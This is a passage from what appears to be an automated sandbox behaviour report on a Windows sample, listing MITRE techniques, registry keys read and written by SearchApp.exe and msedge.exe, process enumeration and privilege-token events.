3560	timeout.exe
224	timeout.exe
3500	timeout.exe
2464	timeout.exe
960	timeout.exe
5532	timeout.exe
5700	timeout.exe
3836	timeout.exe
4504	timeout.exe
3172	timeout.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeSearchApp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe

Modifies registry class 64 IoCs

Processes:

SearchApp.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 2 0009 aa 000a ae 000b ah 000c ao 000d aw 000e ax 000f ay 0010 b 0011 ch 0012 d 0013 dh 0014 eh 0015 er 0016 ey 0017 f 0018 g 0019 h 001a ih 001b iy 001c jh 001d k 001e l 001f m 0020 n 0021 ng 0022 ow 0023 oy 0024 p 0025 r 0026 s 0027 sh 0028 t 0029 th 002a uh 002b uw 002c v 002d w 002e y 002f z 0030 zh 0031"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Anywhere;Trailing"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech SW Voice Activation - English (United States)"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2848"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "0"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\r1033sr.lxa"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{179F3D56-1B0B-42B2-A962-59B7EF59FE1B}"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HW"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "7338"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{14E74C62-DC97-43B0-8F2F-581496A65D60}"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\lsr1033.lxa"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "82"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "10293"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; currency=NativeSupported; net=NativeSupported; url=NativeSupported; address=NativeSupported; alphanumeric=NativeSupported; Name=NativeSupported; media=NativeSupported; message=NativeSupported; companyName=NativeSupported; computer=NativeSupported; math=NativeSupported; duration=NativeSupported"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\AudioInput\\TokenEnums\\MMAudioIn\\"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\tn1033.bin"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com\ = "0"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "3460"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "55"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "411"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{2984A9DB-5689-43AD-877D-14999A15DD46}"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com\ = "0"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "French Phone Converter"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "SR en-US Locale Handler"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "7338"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CacheVersion = "1"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com\NumberOfSubdomains = "0"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "6;18;22"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "You have selected %1 as the default voice."	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft David - English (United States)"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpState = "0"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "3460"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "1"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "CC"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "MS-1033-110-WINMO-DNN"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Mark"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "309C 309C 30A1 30A1 30A2 30A2 30A3 30A3 30A4 30A4 30A5 30A5 30A6 30A6 30A7 30A7 30A8 30A8 30A9 30A9 30AA 30AA 30AB 30AB 30AC 30AC 30AD 30AD 30AE 30AE 30AF 30AF 30B0 30B0 30B1 30B1 30B2 30B2 30B3 30B3 30B4 30B4 30B5 30B5 30B6 30B6 30B7 30B7 30B8 30B8 30B9 30B9 30BA 30BA 30BB 30BB 30BC 30BC 30BD 30BD 30BE 30BE 30BF 30BF 30C0 30C0 30C1 30C1 30C2 30C2 30C3 30C3 30C4 30C4 30C5 30C5 30C6 30C6 30C7 30C7 30C8 30C8 30C9 30C9 30CA 30CA 30CB 30CB 30CC 30CC 30CD 30CD 30CE 30CE 30CF 30CF 30D0 30D0 30D1 30D1 30D2 30D2 30D3 30D3 30D4 30D4 30D5 30D5 30D6 30D6 30D7 30D7 30D8 30D8 30D9 30D9 30DA 30DA 30DB 30DB 30DC 30DC 30DD 30DD 30DE 30DE 30DF 30DF 30E0 30E0 30E1 30E1 30E2 30E2 30E3 30E3 30E4 30E4 30E5 30E5 30E6 30E6 30E7 30E7 30E8 30E8 30E9 30E9 30EA 30EA 30EB 30EB 30EC 30EC 30ED 30ED 30EE 30EE 30EF 30EF 30F0 30F0 30F1 30F1 30F2 30F2 30F3 30F3 30F4 30F4 30F5 30F5 30F6 30F6 30F7 30F7 30F8 30F8 30F9 30F9 30FA 30FA 30FB 30FB 30FC 30FC 30FD 30FD 30FE 30FE 0021 0021 0027 0027 002B 002B 002E 002E 003F 003F 005F 005F 007C 007C"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheVersion = "1"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "22"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "11.0.2016.0129"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_en-US.dat.prev"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "7787"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "8465"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 ^ 0008 1 0009 2 000a ~ 000b : 000c a 000d aw 000e ax 000f ay 0010 b 0011 d 0012 ch 0013 eh 0014 eu 0015 ey 0016 f 0017 g 0018 h 0019 ih 001a iy 001b jh 001c k 001d l 001e m 001f n 0020 ng 0021 oe 0022 oh 0023 ow 0024 oy 0025 p 0026 pf 0027 r 0028 s 0029 sh 002a t 002b ts 002c ue 002d uh 002e uw 002f uy 0030 v 0031 x 0032 y 0033 z 0034 zh 0035"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Spanish Phone Converter"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "1"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "10293"	SearchApp.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

3620 reg.exe
1548 reg.exe
Runs net.exe

pid	process
3620	reg.exe
1548	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exemsedge.exemsedge.exe

pid	process
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4724	msedge.exe
4724	msedge.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
616	msedge.exe
616	msedge.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

4180 taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

Processes:

msedge.exe

pid	process
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe
616	msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

taskmgr.exesvchost.exeSearchApp.exe

description	pid	process
Token: SeDebugPrivilege	4180	taskmgr.exe
Token: SeSystemProfilePrivilege	4180	taskmgr.exe
Token: SeCreateGlobalPrivilege	4180	taskmgr.exe
Token: SeManageVolumePrivilege	1076	svchost.exe
Token: SeDebugPrivilege	2388	SearchApp.exe
Token: SeDebugPrivilege	2388	SearchApp.exe
Token: SeDebugPrivilege	2388	SearchApp.exe
Token: SeDebugPrivilege	2388	SearchApp.exe
Token: SeDebugPrivilege	2388	SearchApp.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exemsedge.exe

pid	process
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
616	msedge.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
616	msedge.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
